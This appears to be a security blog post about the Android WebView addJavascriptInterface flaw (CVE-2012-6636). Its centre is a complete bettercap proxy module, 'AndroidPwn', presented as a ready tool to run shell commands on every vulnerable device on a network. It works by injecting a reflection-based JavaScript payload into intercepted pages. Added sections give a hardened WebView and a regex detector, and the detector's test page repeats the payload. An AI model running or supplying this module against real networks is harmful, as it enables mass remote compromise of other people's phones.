Vulnerability in WebView Leaves Android Devices Open to "MITM" Attack

A WebView vulnerability lets an attacker on the same network compromise every vulnerable Android device automatically via MITM
Unknown
Recently I've been playing with Android WebView-based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability (CVE-2012-6636), which affects every device running a version older than Android 4.2.
There's an excellent post about this vulnerability; long story short, if there's an app which is using a WebView UI control and it's declaring a custom JavaScript interface for it like so:
```java
public class WebViewGUI extends Activity {
  WebView mWebView;
  public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    mWebView=new WebView(this);
    mWebView.getSettings().setJavaScriptEnabled(true);
    mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
    mWebView.loadUrl("file:///android_asset/www/index.html");
    setContentView(mWebView);
  }

  final class JavaScriptInterface {
    JavaScriptInterface () { }
    public String getSomeString() {
      return "string";
    }
  }
}
```
you can inject some special JavaScript into that page and make that device execute any shell command you want.
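For contrast, here is the same Activity hardened against this class of attack. This is an added example written for this page, not code from the original post or from bettercap; the class name `HardenedWebViewGUI` is mine, and it assumes the app's manifest declares `targetSdkVersion` 17 or higher (without that, the `@JavascriptInterface` restriction is not enforced even on Android 4.2+). The `searchBoxJavaBridge_` removal is the bridge the platform itself registers on Android 3.0 through 4.1.

```java
// Added example (not from the original post): the WebView above, hardened.
import android.annotation.SuppressLint;
import android.app.Activity;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class HardenedWebViewGUI extends Activity {
    WebView mWebView;

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);

        // Refuse to navigate to cleartext http:// pages: the injection described in the
        // post only works when an attacker can rewrite an HTML response in transit.
        mWebView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return url.startsWith("http://"); // true = block this load
            }
        });

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            // API 17+ (with targetSdkVersion >= 17): only methods annotated with
            // @JavascriptInterface are reachable from JavaScript, so the
            // getClass().forName(...) reflection path is no longer exposed.
            mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        } else {
            // Android < 4.2 cannot be fixed from the app side: register no bridge at all,
            // and drop the one the platform itself adds on 3.0-4.1.
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
                mWebView.removeJavascriptInterface("searchBoxJavaBridge_");
            }
        }

        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }

    final class JavaScriptInterface {
        // Required on API 17+; an unannotated method is simply not callable from JS.
        @JavascriptInterface
        public String getSomeString() {
            return "string";
        }
    }
}
```

The two changes address the two halves of the attack independently: blocking cleartext loads removes the injection point a MITM needs, and the annotation plus version gate removes the reflection primitive the payload relies on even if a page is tampered with.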
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap, and for this purpose I've written the AndroidPwn transparent proxy module.
```ruby
class AndroidPwn < BetterCap::Proxy::Module
  @@command = nil
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              " try {\n" +
              "   top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
              "   break;\n" +
              " }\n" +
              "catch(e) {}\n" +
              "}\n" +
              "</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""

    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL    : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT  : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""

      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end
```
As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go.
Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every Android device it finds on the network.
Source: Evilsocket
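From the defensive side, the module leaves a recognisable fingerprint in the HTML it rewrites: a `<script>` spliced directly after `</head>`, a `for (i in top)` sweep of the window object, and the `getClass().forName('java.lang.Runtime')` reflection chain. The detector below, an added example that is not part of the original post or of bettercap, turns those three traits into checks that a content-inspection proxy or a unit test could run over HTTP response bodies. The class name `WebViewInjectionDetector` and the sample pages are constructed for this example; the injected sample reproduces the payload exactly as the post shows it (including its `COMMAND_HERE` placeholder).

```java
// Added example (not from the original post): flag HTML that carries the AndroidPwn payload.
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class WebViewInjectionDetector {
    // Decisive indicator: the reflection chain that reaches java.lang.Runtime from a JS bridge.
    private static final Pattern RUNTIME_REFLECTION = Pattern.compile(
        "getClass\\(\\)\\s*\\.\\s*forName\\(\\s*['\"]java\\.lang\\.Runtime['\"]\\s*\\)",
        Pattern.CASE_INSENSITIVE);
    // Supporting indicator: enumeration of every property of window.top.
    private static final Pattern TOP_ENUM = Pattern.compile(
        "for\\s*\\(\\s*\\w+\\s+in\\s+top\\s*\\)", Pattern.CASE_INSENSITIVE);
    // Supporting indicator: a script opened immediately after </head>, where the module splices.
    private static final Pattern SCRIPT_AFTER_HEAD = Pattern.compile(
        "</head>\\s*<script", Pattern.CASE_INSENSITIVE);

    /** Returns a human-readable list of the indicators present in the page. */
    public static List<String> findIndicators(String html) {
        List<String> hits = new ArrayList<>();
        if (RUNTIME_REFLECTION.matcher(html).find()) {
            hits.add("java.lang.Runtime reached via getClass().forName()");
        }
        if (TOP_ENUM.matcher(html).find()) {
            hits.add("enumeration of window.top properties");
        }
        if (SCRIPT_AFTER_HEAD.matcher(html).find()) {
            hits.add("<script> spliced directly after </head>");
        }
        return hits;
    }

    /** Only the reflection chain is treated as decisive; the other two alone are common in benign pages. */
    public static boolean isSuspicious(String html) {
        return RUNTIME_REFLECTION.matcher(html).find();
    }

    public static void main(String[] args) {
        // Constructed sample pages, not captured traffic.
        String clean = "<html><head><title>t</title></head>"
            + "<body><script>var x = 1;</script></body></html>";
        String injected = "<html><head><title>t</title></head><script>\n"
            + "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n"
            + "for(i in top) {\n try {\n"
            + "   top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null)"
            + ".invoke(null,null).exec(cmd);\n   break;\n }\ncatch(e) {}\n}\n"
            + "</script><body></body></html>";

        for (String page : new String[] { clean, injected }) {
            System.out.println(isSuspicious(page) + " " + findIndicators(page));
        }
    }
}
```

Because the module only rewrites responses that it can see in cleartext, the same signature is just as usable as an IDS content rule on the wire; the more durable mitigation, though, is the one on the app side (TLS for page loads and a properly annotated interface on API 17+), since a network detector sees nothing once the attacker is on a segment the sensor does not cover.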
